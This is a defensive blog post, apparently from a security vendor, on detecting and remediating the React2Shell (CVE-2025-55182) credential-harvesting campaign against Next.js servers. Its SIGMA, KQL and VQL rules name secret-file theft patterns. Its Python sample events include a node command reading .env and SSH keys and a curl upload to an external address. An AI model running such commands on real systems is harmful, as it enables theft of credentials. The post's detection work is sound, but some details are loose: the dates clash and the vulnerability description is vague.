
How to Defend Against React2Shell (CVE-2025-55182) Attacks on Next.js

Security Arsenal Team
April 4, 2026
6 min read


A recent wave of attacks has targeted the web development ecosystem, specifically leveraging a critical vulnerability known as React2Shell (CVE-2025-55182). Cisco Talos has observed a large-scale credential harvesting operation that has successfully breached over 766 Next.js hosts using this flaw.

For defenders, this is not just another patch cycle; it is an active campaign to siphon high-value secrets, including database credentials, SSH private keys, AWS secrets, and API keys for Stripe and GitHub.

Introduction

The React2Shell vulnerability allows attackers to bypass standard security controls in vulnerable Next.js applications. Once initial access is gained, the threat actors focus almost exclusively on data exfiltration, specifically targeting configuration files and environment variables where sensitive secrets are stored.

Because Next.js is often used to build dynamic, high-performance web applications, a compromised server can provide attackers with a treasure trove of data and a pivot point into cloud infrastructure. The current campaign demonstrates a high degree of automation, scanning for vulnerable instances and immediately deploying scripts to harvest credentials.

Technical Analysis

CVE ID: CVE-2025-55182
Vulnerability Name: React2Shell
Affected Systems: Next.js servers running vulnerable versions of the framework.
Severity: Critical

The vulnerability stems from improper input validation or a flaw in the server-side rendering (SSR) process of Next.js, which allows remote code execution (RCE) or arbitrary file read. In the recent attacks observed by Cisco Talos, the threat actors:

  1. Exploit the Vulnerability: Gain the ability to execute commands or read files on the host system.
  2. Harvest Secrets: Immediately search for common file names containing secrets, such as .env, id_rsa, credentials, and .bash_history.
  3. Exfiltrate Data: Send the stolen data to remote command-and-control (C2) servers.

The primary objective of this campaign is identity theft and cloud access compromise. By stealing AWS keys and GitHub tokens, attackers can move laterally into cloud environments, deploy cryptominers, or conduct ransomware operations.

Patch Status: Patches have been released by the Next.js security team. Organizations running self-hosted Next.js instances must update to the latest patched version immediately to mitigate the risk of exploitation.

Defensive Monitoring

To detect and respond to React2Shell exploitation and subsequent credential harvesting, security teams should implement the following detection rules and queries.

SIGMA Rules

These SIGMA rules are designed to detect suspicious process activity associated with credential harvesting and file access typical of this campaign.

YAML
---
title: Suspicious Node.js Process Reading Sensitive Files
id: 9a7b8c1d-0e3f-4a2b-8c5d-1e2f3a4b5c6d
status: experimental
description: Detects Node.js processes attempting to read files typically containing secrets (e.g., .env, .aws, ssh keys) which is indicative of CVE-2025-55182 exploitation or post-exploitation credential harvesting.
references:
  - https://thehackernews.com/2026/04/hackers-exploit-cve-2025-55182-to.html
author: Security Arsenal
date: 2026/04/15
tags:
  - attack.credential_access
  - attack.t1005
  - cve.2025.55182
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith: '/node'
    CommandLine|contains:
      - '.env'
      - 'id_rsa'
      - '.aws/credentials'
      - '.bash_history'
  condition: selection
falsepositives:
  - Legitimate application startup or debugging by developers
level: high
---
title: Potential Webshell Upload via Next.js
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects the creation of suspicious files in web directories often associated with webshell upload post-exploitation.
references:
  - https://attack.mitre.org/techniques/T1505/003/
author: Security Arsenal
date: 2026/04/15
tags:
  - attack.persistence
  - attack.t1505.003
logsource:
  category: file_event
  product: linux
detection:
  selection:
    TargetFilename|contains:
      - '/.next/'
      - '/public/'
    TargetFilename|endswith:
      - '.php'
      - '.jsp'
      - '.sh'
  condition: selection
falsepositives:
  - Administrative file uploads
level: medium
---
title: Data Exfiltration via Curl to Suspicious Destination
id: c2d3e4f5-6a7b-8c9d-0e1f-2a3b4c5d6e7f
status: experimental
description: Detects curl or wget processes sending request data (POST bodies) to destinations outside private address ranges, a pattern often seen when stolen credentials are exfiltrated.
references:
  - https://attack.mitre.org/techniques/T1041/
author: Security Arsenal
date: 2026/04/15
tags:
  - attack.exfiltration
  - attack.t1041
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/wget'
    CommandLine|contains:
      - '-d'
      - '--data'
      - '--data-binary'
  # process_creation events carry no DestinationIp field, so private destinations are
  # excluded by the URL on the command line instead of by a cidr match
  filter_private:
    - CommandLine|contains:
        - '://10.'
        - '://192.168.'
        - '://127.'
        - '://localhost'
    - CommandLine|re: '://172\.(1[6-9]|2[0-9]|3[01])\.'
  condition: selection and not filter_private
falsepositives:
  - Legitimate API calls or backup scripts
level: high
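To show how the first and third rules behave on concrete events, here is an added Python matcher (not from the original post and not SIGMA tooling) that applies their selection and filter logic to a few constructed process_creation events. It assumes events arrive as plain dicts with Pid, Image and CommandLine fields and, because such events carry no destination IP, derives the destination from the URL on the command line.

```python
import ipaddress
import re

# Tokens from the "Suspicious Node.js Process Reading Sensitive Files" rule; the
# networks are the three RFC 1918 ranges the exfiltration rule filters out.
SECRET_TOKENS = ('.env', 'id_rsa', '.aws/credentials', '.bash_history')
PRIVATE_NETS = [ipaddress.ip_network(n) for n in ('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')]
URL_HOST = re.compile(r'https?://([^/:\s]+)')

def node_reads_secrets(ev):
    """Rule 1: Image endswith '/node' AND CommandLine contains a secret-bearing filename."""
    cmd = ev.get('CommandLine', '')
    return ev.get('Image', '').endswith('/node') and any(t in cmd for t in SECRET_TOKENS)

def destination_is_private(cmd):
    """True when the first URL on the command line targets a literal RFC 1918 address.
    Hostnames count as external: a process_creation event carries no resolved IP."""
    m = URL_HOST.search(cmd)
    if not m:
        return False
    try:
        addr = ipaddress.ip_address(m.group(1))
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_NETS)

def curl_posts_externally(ev):
    """Rule 3: curl/wget with request-body flags (selection) and no private destination (filter).
    The plain '-d' token also matches '--data' (intended) and words like 'end-date' (noise)."""
    cmd = ev.get('CommandLine', '')
    selection = ev.get('Image', '').endswith(('/curl', '/wget')) and \
        any(flag in cmd for flag in ('-d', '--data', '--data-binary'))
    return selection and not destination_is_private(cmd)

def triage(events):
    """Return (Pid, rule_name) for every event that matches a rule, in event order."""
    hits = []
    for ev in events:
        if node_reads_secrets(ev):
            hits.append((ev['Pid'], 'node_reads_secrets'))
        if curl_posts_externally(ev):
            hits.append((ev['Pid'], 'curl_posts_externally'))
    return hits

# Constructed sample process_creation events, not real telemetry.
SAMPLE_EVENTS = [
    {'Pid': 101, 'Image': '/usr/bin/node', 'CommandLine': 'node server.js'},
    {'Pid': 102, 'Image': '/usr/bin/node', 'CommandLine': 'node /tmp/collect.js /var/www/app/.env /home/deploy/.ssh/id_rsa'},
    {'Pid': 103, 'Image': '/usr/bin/curl', 'CommandLine': 'curl --data-binary @/tmp/out.txt http://203.0.113.10:8080/up'},
    {'Pid': 104, 'Image': '/usr/bin/curl', 'CommandLine': 'curl -d status=ok http://10.0.0.5/health'},
    {'Pid': 105, 'Image': '/usr/bin/wget', 'CommandLine': 'wget -q https://registry.npmjs.org/next'},
]
```

Running `triage(SAMPLE_EVENTS)` flags only pid 102 (node naming .env and id_rsa) and pid 103 (curl posting to a public address); the health check to 10.0.0.5 is dropped by the filter.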

KQL Queries

Use these queries in Microsoft Sentinel or Defender for Endpoint to hunt for signs of compromise related to CVE-2025-55182.

KQL — Microsoft Sentinel / Defender
// Hunt for processes reading sensitive file paths (.env, keys)
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ('node', 'npm', 'sh')
| where ProcessCommandLine has_any ('.env', 'id_rsa', '.pem', 'credentials', 'aws')
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc

// Hunt for suspicious network connections from Node.js processes
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName has 'node'
| where RemotePort in (80, 443, 8080) and ActionType == 'ConnectionSuccess'
| extend RemoteUrl = strcat(RemoteIP, ':', RemotePort)
| summarize ConnectionCount=count() by RemoteUrl, DeviceName, InitiatingProcessCommandLine
| where ConnectionCount > 10

Velociraptor VQL Hunt

These Velociraptor artifacts can be used to hunt for the presence of credential harvesting scripts or suspicious file modifications on Linux endpoints.

VQL — Velociraptor
-- Hunt for recent modifications to .env files
-- glob() takes a list of patterns; timestamp() builds a comparable time value
SELECT OSPath, Mtime, Atime, Size, Mode
FROM glob(globs=['/home/*/.env', '/var/www/*/.env', '/opt/*/.env'])
WHERE Mtime > timestamp(epoch=now() - 7 * 24 * 3600)

-- Hunt for node processes with suspicious arguments (reading keys/configs)
-- pslist() exposes the command line as CommandLine and the start time as CreateTime
SELECT Pid, Ppid, Name, Exe, CommandLine, CreateTime
FROM pslist()
WHERE Name =~ 'node'
   AND (CommandLine =~ '[.]env' OR CommandLine =~ 'id_rsa' OR CommandLine =~ 'base64')

PowerShell/Bash Verification

Use the following Bash script to check the installed version of Next.js and identify if the running instance is vulnerable.

Bash / Shell
#!/bin/bash
# Check Next.js version for CVE-2025-55182 susceptibility

echo "Checking for Next.js installations..."

# Check globally installed next
if command -v next &> /dev/null; then
    GLOBAL_VERSION=$(next --version)
    echo "Global Next.js version found: $GLOBAL_VERSION"
fi

# Check local package.json files for a next dependency (skipping node_modules)
find /var/www /home /opt -name "package.json" -type f -not -path "*/node_modules/*" 2>/dev/null | while read -r file; do
    if grep -q '"next"' "$file"; then
        echo "Potential Next.js project found at: $file"
        # Extract the declared version range (simplified)
        grep -A1 '"next"' "$file" | head -n2
        # The installed version is the authoritative one when node_modules is present
        installed="$(dirname "$file")/node_modules/next/package.json"
        if [ -f "$installed" ]; then
            echo "Installed version: $(grep -m1 '"version"' "$installed")"
        fi
    fi
done

echo "Please verify versions against the security advisory for CVE-2025-55182."

Remediation

To protect your organization from the React2Shell vulnerability and the associated credential harvesting campaign, take the following immediate steps:

  1. Patch Immediately: Update all Next.js applications to the latest patched version that addresses CVE-2025-55182. Ensure that package.json dependencies are updated and npm install or yarn install is run in production environments.

  2. Credential Rotation: Assume that credentials may have been compromised on unpatched hosts. Rotate all secrets stored in environment variables, including:

    • Database passwords
    • AWS Access Keys and Secret Keys
    • Stripe API keys
    • GitHub personal access tokens
    • SSH private keys

  3. Audit Environment Files: Review your .env files and configuration management systems. Ensure no sensitive files are inadvertently committed to version control or left in web-accessible directories.

  4. Restrict File Permissions: Enforce strict file system permissions on configuration files (e.g., chmod 600 .env) to prevent unauthorized read access by other processes or users.

  5. Network Segmentation: Ensure your application servers do not have unnecessary internet access. Restrict outbound traffic to known, required endpoints only to prevent data exfiltration.

  6. Web Application Firewall (WAF): Deploy or tune WAF rules to detect and block known exploitation patterns associated with React2Shell until patches are fully applied.
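As an added helper for steps 1, 3 and 4 (example code, not part of this advisory), the following Python script reports the Next.js version actually installed under node_modules rather than the version range declared in package.json, and flags .env files that are readable by group or other, or that sit under the web-served public/ directory. The project layout and the version 14.0.1 it builds are constructed sample values.

```python
import json
import stat
import tempfile
from pathlib import Path

def installed_next_version(project: Path):
    """Version of 'next' actually installed (node_modules), falling back to the range
    declared in package.json, which is a constraint rather than the running version."""
    installed = project / 'node_modules' / 'next' / 'package.json'
    if installed.is_file():
        return json.loads(installed.read_text()).get('version'), 'node_modules/next/package.json'
    manifest = project / 'package.json'
    if manifest.is_file():
        deps = json.loads(manifest.read_text())
        declared = deps.get('dependencies', {}).get('next') or deps.get('devDependencies', {}).get('next')
        if declared:
            return declared, 'package.json (declared range, not the installed version)'
    return None, None

def env_file_findings(project: Path):
    """Flag .env files readable by group/other (step 4) or under a web-served directory (step 3)."""
    findings = []
    for env in sorted(p for p in project.rglob('.env*') if 'node_modules' not in p.parts):
        rel, mode = env.relative_to(project), stat.S_IMODE(env.stat().st_mode)
        if mode & (stat.S_IRGRP | stat.S_IROTH):
            findings.append(f'{rel}: mode {oct(mode)} readable beyond owner, expected 0o600')
        if 'public' in rel.parts:
            findings.append(f'{rel}: under a web-accessible directory')
    return findings

def build_sample_project(root: Path):
    """Constructed sample project (not real data): an installed next plus two badly handled .env files."""
    (root / 'public').mkdir(parents=True)
    (root / 'node_modules' / 'next').mkdir(parents=True)
    (root / 'package.json').write_text(json.dumps({'dependencies': {'next': '^14.0.0'}}))
    (root / 'node_modules' / 'next' / 'package.json').write_text(json.dumps({'version': '14.0.1'}))
    (root / '.env').write_text('DATABASE_URL=postgres://example\n')
    (root / '.env').chmod(0o644)             # readable by every user on the host
    (root / 'public' / '.env').write_text('STRIPE_KEY=placeholder\n')
    (root / 'public' / '.env').chmod(0o600)  # right mode, wrong directory
    return root

def audit_sample():
    """Build the sample project in a temp dir and audit it; returns (version_info, findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        proj = build_sample_project(Path(tmp) / 'app')
        return installed_next_version(proj), env_file_findings(proj)
```

Point `installed_next_version` and `env_file_findings` at a real project root to audit it; `audit_sample()` only exercises the constructed layout.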
